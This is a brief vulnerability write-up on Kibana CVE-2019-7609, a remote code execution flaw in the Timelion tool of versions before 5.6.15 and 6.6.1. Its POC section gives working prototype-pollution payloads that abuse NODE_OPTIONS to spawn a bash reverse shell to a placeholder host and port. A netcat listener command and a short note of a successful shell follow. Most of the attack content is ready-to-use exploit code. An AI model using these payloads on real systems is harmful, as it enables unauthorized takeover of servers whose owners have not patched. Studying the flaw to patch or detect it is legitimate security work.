Kibana remote code execution vulnerability (CVE-2019-7609)
Vulnerability introduction
An official announcement in February 2019 stated that Kibana has remote code execution vulnerabilities. Kibana versions before 5.6.15 and 6.6.1 have functional flaws in the Timelion visualization tool, allowing attackers to use Kibana to execute arbitrary code on the server. Kibana is an open source data visualization plugin for Elasticsearch. It provides visualization functions for Elasticsearch, which can be used to search and view the data stored in the Elasticsearch index, and can visualize the data in the form of various icons, tables, and maps. Due to the convenience of its functions, it is widely used in product development.
Sphere of influence
Affected version
Kibana <5.6.15 Kibana <6.6.1 Unaffected
version
Kibana = 5.6.15 Kibana >= 6.6.1
POC
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash - c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Vulnerability recurrence
Use nc monitoring on the attacker
nc -nvlp 1234
Find an unauthorized page to execute shell
rebound successfully